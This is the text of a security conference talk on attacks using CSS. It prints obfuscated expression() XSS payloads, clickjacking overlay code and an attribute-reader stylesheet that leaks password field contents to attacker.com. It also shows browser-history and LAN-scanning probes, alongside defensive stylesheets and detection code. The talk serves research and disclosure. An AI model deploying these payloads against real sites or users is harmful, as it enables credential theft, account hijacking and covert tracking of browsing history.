
The Sexy Assassin

Tactical Exploitation using CSS


CSS Presentation Overview

Old Attacks

New Research

New Attacks
Old Attacks - reloaded

Known attacks using CSS


XSS using CSS - Impact

Session riding/hijacking attack

Steal page data content

Exploit BoF/HoF/memory corruption/etc. vulnerabilities

All other XSS threats


Expression XSS

CSS values can be escaped with backslashes


<div style=xss:e\xp\re\s\s\i\o\n(alert(1))></div>
Then further encoded with hex/decimal entities
<div style=xss:e&#92xp&#92re&#92s&#92s&#92i&#92o&#92n(alert(1))></div>

Following the CSS specification you can encode expressions with hex escapes:

<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div>
Expression XSS continued

We can also entity encode the previous vector


<div style=xss:&#92&#54&#53&#92&#55&#56&#92&#55&#48&#92&#55&#50&#92&#54&#53&#92&#55&#51&#92&#55&#51&#92&#54&#57&#92&#54&#102&#92&#54&#101&#92&#50&#56&#92&#54&#49&#92&#54&#99&#92&#54&#53&#92&#55&#50&#92&#55&#52&#92&#50&#56&#92&#51&#49&#92&#50&#57&#92&#50&#57></div>
External style sheet tricks

• Expressions can be executed in external style sheets


• We can encode the vector
• We can also encode the content

Importing expressions from a XSS file


<style>@\69\6d\70\6f\72\74 'xss.css';</style>

How can we encode the content of a style sheet?


<style>@import 'utf.css';</style>
UTF-7 Expression

UTF-7 encoded style sheet

@charset "UTF-7";
+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0-

Which produces:

* {xss:expression(alert(1))}
CSS Overlays (clickjacking)

CSS Overlays (clickjacking) definition: convincing the user to click on
something, and using that click to do something else (bad things).
CSS Overlays description

[Diagram: the original web page on the left and the attacker page on the right; the attacker page contains an iframe and a "Click here to continue" label, with the original page's button positioned underneath it.]
CSS Overlays advanced attacks

• Multiple iframes nested

• Using offsets to gather a piece of a target site

• No opacity, filled white div regions

• Single sign on services vulnerable

• Combined JavaScript and CSS tricks to intercept a click, impossible to
know until it's too late
CSS Overlays advanced attacks
Verisign case study
iframe performs a login request on site (ficlets.com)

<form action="http://ficlets.com/signin/openid.signin"
      method="post" id="openid-form" target="iframe">
  <input type="hidden" name="openid" id="openid-url" class="text-field"
         value="openidtester.pip.verisignlabs.com" />
</form>

ficlets.com connects to Verisign provider 
CSS Overlays advanced attacks
Verisign case study cont.
OpenID provider (Verisign) is now in our iframe
CSS Overlays advanced attacks
Verisign case study cont.
Using multiple iframes and div offsets we can cover the other areas
with solid colours and position the target area wherever we like
CSS Overlays advanced attacks
Verisign case study cont.
• Opacity can be used, but solid fills make the attack harder to
protect against at the browser level
• Referer checking can neuter the attack, but the header is not always
available and the check is not implemented on most sites
• Referer can be faked
• David Ross' idea: use a "clickjacket", an accessible style sheet
which uses expressions to display a hover popup that appears
above other elements.
CSS Overlays Workarounds

Someone -> iframe-breaker
In some browsers (IE) JS can be disabled (iframe-breaker-breaker)

NoScript -> Opacity disabled on remote iframes and embedded content.
CSS overlays that don't require opacity still work.

Michal Zalewski -> click only if not obstructed
Still works against some no-opacity overlay attacks.

Mozilla -> Delayed disabled buttons.
Still exploitable

David Ross -> X-I-Don't-Wanna-Be-Iframed-Please
Old browsers and websites still vulnerable.
Exploiting clickjacking defenses

• iframe hover state can be intercepted


• No way to tell if you're hovering over an external site
• Clicks can then be transferred to the iframe when a user clicks

<html>
<head>
</head>
<body>
<image ISMAP style="position:absolute;width:100%;height:100%;"
       onmousedown="this.style.display='none'">
<iframe src="http://www.microsoft.com" id=x type=text/html
        width=500 height=500 codetype=text/html></iframe></image>
</body>
</html>
Exploiting clickjacking defenses

• Image intercepts the hover state


• Image is hidden onmousedown
• The click is transferred to the iframe because the mousedown state
is used, onmouseup we're in the iframe
More clickjacking defenses

• My extension to David Ross' click jacket


• Full metal click jacket
• CSS accessible style sheet is used to override browser defaults
with !important.

iframe,frame,object,applet {
    border:1px solid #000 !important;
    visibility:visible !important;
    opacity: 1 !important;
    filter: alpha(opacity=100) !important;
    position:absolute !important;
    float:none !important;
    overflow:auto !important;
    ....
}
More clickjacking defenses

Advantages:
• Object styles are locked
• User can clearly see that it is an external site
• JavaScript and CSS modification of styles has no effect

Disadvantages:
• Manuel Caballero hacked it :)
• Parent element allows opacity modification
More clickjacking defenses

Browser level CSS locks could prevent attacks

Advantages:
• Hard for attacker to exploit if external objects are clearly visible
and above everything else

Disadvantages:
• Designers would complain about limiting design ideas
• External objects would look ugly
• Could break existing sites
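As an added defender-side example, not code from the talk: the response-header check that David Ross' "X-I-Don't-Wanna-Be-Iframed-Please" idea shipped as, X-Frame-Options, evaluated the way a browser does before it lets a page be framed. Header values, origins and the attacker/target names are constructed; the point is that a missing or misspelled header leaves the page framable, which is the "old websites still vulnerable" case above.

```javascript
// Added example (not from the talk): evaluate a response's X-Frame-Options
// header the way a browser does before letting a page be framed.
// Assumptions: headers is a plain object; origins are "scheme://host[:port]"
// strings; ancestorOrigins lists every framing document, top first; only one
// header value is present (conflicting duplicates are out of scope here).

function framingDecision(headers, framedOrigin, ancestorOrigins) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === 'x-frame-options');
  if (key === undefined) {
    // No header at all: the page can be overlaid as described in the slides.
    return { allowed: true, reason: 'no X-Frame-Options header' };
  }
  const value = String(headers[key]).trim().toUpperCase();
  if (value === 'DENY') {
    return { allowed: false, reason: 'DENY: never framable' };
  }
  if (value === 'SAMEORIGIN') {
    // Strict reading: every ancestor must match, not just the direct parent,
    // otherwise attacker -> target -> target nesting slips through.
    const foreign = ancestorOrigins.find(o => o !== framedOrigin);
    return foreign === undefined
      ? { allowed: true, reason: 'SAMEORIGIN: all ancestors match' }
      : { allowed: false, reason: `SAMEORIGIN: foreign ancestor ${foreign}` };
  }
  // Browsers ignore values they do not recognise, so a typo fails open.
  return { allowed: true, reason: `unrecognised value "${value}" ignored` };
}

// Constructed scenario mirroring the overlay described above: attacker.example
// frames the target page directly, and then through one more frame.
function demo() {
  const target = 'https://target.example';
  const chain = ['https://attacker.example'];
  return {
    noHeader: framingDecision({}, target, chain).allowed,
    deny: framingDecision({ 'X-Frame-Options': 'DENY' }, target, chain).allowed,
    sameOriginNested: framingDecision({ 'x-frame-options': 'sameorigin' }, target,
                                      ['https://attacker.example', target]).allowed,
  };
}
```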
New Research

Algorithms
Arithmetics & Memory
- Check out Demos on http://p42.us/css

How:
element:condition{
action;
}

element: anything
condition: :visited, :active, :hover, :selected, etc..
action: background(remote request), display,
opacity, visibility.
Loops
- Check out Demos on http://p42.us/css

Recalc of style:

- META refreshes
<meta http-equiv="refresh" content="0;URL=#1">

- -moz-binding
*{-moz-binding:url("remote-req#id")}

- webkit proposed CSS based animations (not very useful)
@keyframes{}
Server Side Interaction
- Check out Demos on http://p42.us/css

Use HTML+XML data loading (IE only or Firefox only)
MSIE HTC files, XML DATAFLD
moz-binding

Meta refreshes + stylesheet update (not cross-browser)
<meta http-equiv="refresh" content="0">

Async stylesheet loading (doesn't work in strict mode)
<element>
<style>@import "//url1";</style>
<style>@import "//url2";</style>

Multiple iframe loading (works everywhere)
<iframe src="site.com/"></iframe>
<iframe src="site.com//"></iframe>
New attacks

Attacks possible thanks to the "theory"


CSS HTML Attribute Reader

CSS HTML Attribute Reader

How to read HTML Attributes using CSS, without javascript.


CSS HTML Attribute Reader

Advanced CSS3 Attribute Selectors:

For matching:
<input type="password" value="savedpassword"/>

• input{}
– Matches all inputs.

• input[type]{}
– Matches all inputs with an attribute "type".

• input[type="password"]{}
– Matches all inputs of type "password".
CSS HTML Attribute Reader

Advanced CSS3 Attribute Selectors:

For matching:
<input type="password" value="savedpassword"/>

• input[type*="swor"]{}
– Matches all input elements whose type attribute contains "swor"
(anywhere)

• input[type^="pass"]{}
– Matches all inputs whose type attribute starts with "pass"

• input[type$="word"]{}
– Matches all inputs whose type attribute ends with "word"
CSS HTML Attribute Reader

Attempt to read an attribute with the [=] selector, with the help of the [*=]
selector: first calculate the range of the chars in the value.

input[value*="\x10"]{
background:url("//attacker.com/?h=\x10");
}

... 111 different variations ...

input[value*="\x7F"]{
background:url("//attacker.com/?h=\x7F");
}
CSS HTML Attribute Reader – Try 3

To calculate the first letter, if we assume from the previous step that
the range is [uiopasdf]:

input[value^="u"]{
background:url("//attacker.com/?s=u");
}

and so on, 8 questions... u,i,o,p,a,s,d,f

input[value^="f"]{
background:url("//attacker.com/?s=f");
}
CSS HTML Attribute Reader – Try 3

Once we have found the first char (let's say it was d) we continue with
[uiopasf]:

input[value^="du"]{
background:url("//attacker.com/?s=du");
}

and so on, 7 questions... u,i,o,p,a,s,f

input[value^="df"]{
background:url("//attacker.com/?s=df");
}
CSS HTML Attribute Reader – Try 3

And so on. If we assume a known attribute length, but allow for repeats…

111+N^2 CSS rules

In the worst case for 8 chars: 175 CSS rules

In the worst case for 50 chars: 2,611 CSS rules


CSS HTML Attribute Reader

We can optimize this more, but at an implementation level.

First, we can use [^=] and [$=] selectors at the same time halving
the number of requests.
CSS HTML Attribute Reader

1. Detect the range
2. Detect first char and eighth char
3. Detect second char and seventh char
4. Detect third char and sixth char
5. Detect fourth char and fifth char
6. Confirm we have the correct string
CSS HTML Attribute Reader

Demo:
- Async stylesheet load attribute reader (read the contents of a text field w

http://eaea.sirdarckcat.net/cssar/

Parallel discovery by Stefano Di Paola (WiSec) with 111*N complexity
(888 rules for 8 chars)
http://www.wisec.it/
-1day (0Day-1) - Cross Site Styling

HTML5 describes seamless iframes.

So HTML attribute reading would be a vulnerability in a non-implemented
standard!

These will inherit all styles of the parent document (cross-origin).

CSS will read content cross-origin!

Call for Microsoft's guys in the W3C HTML5 WG: stop this! Make it
same-origin only ;)

<style>@import "exploit";</style>
<iframe src="victim" seamless="seamless"/>
CSS History Hacks

CSS History Hacks

Attacks based on CSS being able to read the browser's history.
Visited boolean

Cross-browser
<style>
a:visited{background:url(//visited)}
a:not(:visited){background:url(//not-visited)}
</style>
<a href="http://website/">&nbsp;</a>

Impact: privacy

Counter-measures:
Firefox: SafeHistory addon
IE: disable history

Demo: http://ha.ckers.org/weird/CSS-history.cgi
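An added example, not code from the talk, that serves both the CSS attribute reader above and the :visited history probes on this slide (the LAN scanner below uses the same :visited primitive): a scanner that flags stylesheet rules whose selector probes an attribute value or the visited state and whose body fetches a remote url(), and that treats many sibling probes on one attribute as the strong signal. The function names, the sample CSS and the per-attribute threshold are constructed for the example.

```javascript
// Added example (not from the talk): flag the two CSS exfiltration patterns
// described in the slides, the attribute-selector reader and the :visited
// history probe, where a selector is paired with a request to a remote url().
// Assumptions: plain CSS text without comments; a URL counts as remote when it
// starts with a scheme or with "//".

const RULE_RE = /([^{}]+)\{([^}]*)\}/g;                  // selector { decls }
const URL_RE = /url\(\s*["']?([^"')\s]+)["']?\s*\)/gi;    // url("...") / url(...)
const ATTR_PROBE_RE = /\[\s*([\w-]+)\s*[\^$*]=/;          // [value^= [value*= [value$=
const HISTORY_PROBE_RE = /:visited\b/i;                   // :visited, :not(:visited)

function isRemoteUrl(url) {
  return /^(?:[a-z][a-z0-9+.-]*:)?\/\//i.test(url);
}

// One finding per rule whose selector is a probe and whose body beacons out.
function findCssProbes(cssText) {
  const findings = [];
  for (const m of cssText.matchAll(RULE_RE)) {
    const selector = m[1].trim();
    const beacons = [...m[2].matchAll(URL_RE)].map(u => u[1]).filter(isRemoteUrl);
    if (beacons.length === 0) continue;                  // no beacon, no leak
    const attr = ATTR_PROBE_RE.exec(selector);
    if (HISTORY_PROBE_RE.test(selector)) {
      findings.push({ kind: 'history-probe', selector, url: beacons[0] });
    } else if (attr) {
      findings.push({ kind: 'attribute-probe', attribute: attr[1], selector, url: beacons[0] });
    }
  }
  return findings;
}

// The reader needs many sibling rules per attribute (111 range probes, then one
// per candidate prefix), so the count per attribute is the strong signal; a
// single [href^="http"] external-link icon rule stays below the threshold.
function suspiciousAttributes(findings, threshold = 5) {
  const counts = new Map();
  for (const f of findings) {
    if (f.kind === 'attribute-probe') counts.set(f.attribute, (counts.get(f.attribute) || 0) + 1);
  }
  return [...counts].filter(([, n]) => n >= threshold).map(([a]) => a);
}

// Constructed sample modelled on the rules shown in the slides.
const SAMPLE_CSS = [
  'input[value*="\\x10"]{background:url("//attacker.example/?h=10")}',
  ...'uiopasdf'.split('').map(c => `input[value^="${c}"]{background:url("//attacker.example/?s=${c}")}`),
  'a:visited{background:url(//attacker.example/visited)}',
  'a:not(:visited){background:url(//attacker.example/not-visited)}',
  'a[href^="http"]{background:url(//cdn.example/ext.png)}',
  '.logo{background:url(/img/logo.png)}',
].join('\n');
```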
CSS LAN Scanner

PoC:
CSS LAN Scanner

How it works:
Error pages don't create a log in the history.
If a website is valid, then it is marked as visited.
The scanner just visits a lot of LAN IPs, and checks
if they were marked as visited.
CSS LAN Scanner

Victim visits attacker.com.

[Diagram: attacker.com on the Internet; the victim's LAN intranet contains 10.3.22.111 (private web service) and 192.168.1.254 (router configuration page).]
CSS LAN Scanner

attacker.com tries to open a lot of local IP addresses in iframes; most
will fail.
CSS LAN Scanner

attacker.com then asks which websites appear as visited, and so, those
IPs are up.
CSS LAN Scanner

The victim responds to the attacker with the visited IPs.
CSS LAN Scanner

attacker.com then tries to guess the service on those IPs based on ports,
and if necessary, the content of remote stylesheets.
CSS LAN Scanner

attacker.com then sends CSRF attacks against the detected software behind
the LANs.
CSSH - CSS Stealing Some History

CSSH - CSS Stealing Some History

History Crawler + Navigation Monitoring!


CSSH - History Crawler

attacker.com shows a lot of possible websites that the user may have
visited.

[Diagram: attacker.com probes the victim with candidate sites: digg.com, twitter.com, slashdot.org, hi5.com, myspace, google news, msn.com, del.icio.us, live.com, sla.ckers.org, Redtube, facebook.]
CSSH - History Crawler

The victim responds to the attacker with the websites visited.
CSSH - History Crawler

Attacker fetches the links of those websites, and asks which ones are
visited. The victim responds, and the exploit asks again endlessly.

[Diagram: attacker.com sends Link #1 to Link #6 to the victim.]
CSSH - History Crawler

This way we can effectively crawl the commonly visited websites of a user.

The privacy implications of this are huge.

This attack is not a secret; it was described in Mozilla's bug tracker by
Paul Stone:
https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c78

 
CSSH - Navigation Monitoring

What if...

We could detect in real time the navigation of a user using our history
crawler?

Might this be possible?

Yes
CSSH - Navigation Monitoring

Victim visits attacker.com.

[Diagram: the attacker's site on the left, the victim's browser on the right.]
CSSH - Navigation Monitoring

attacker.com sends the exploit to the user, and opens digg.com.
CSSH - Navigation Monitoring

The exploit detects that digg.com was visited, so it alerts attacker.com,
and attacker.com fetches the links on digg.com.
CSSH - Navigation Monitoring

Then, the attacker updates the exploit, and starts asking for each link
whether any of them are visited.
CSSH - Navigation Monitoring

When the user finally clicks on a link, the exploit detects it, and
alerts attacker.com.
CSSH - Navigation Monitoring

attacker.com fetches all links on cnn.com, and updates the exploit asking
whether they were visited.
CSSH - Navigation Monitoring

Repeat the above steps indefinitely.
CSSH - Navigation Monitoring

Public Demo :
http://eaea.sirdarckcat.net/cssh-mon/

Cross-browser.
Thanks

We would like to thank:
Bluehat team, David Ross, Robert Hansen,
Jeremiah Grossman, Giorgio Maone, Alex K,
David Lenoe (Adobe PSIRT), Google Sec. Team,
Stefano DiPaola, and everyone else that assisted in
any way with our research.
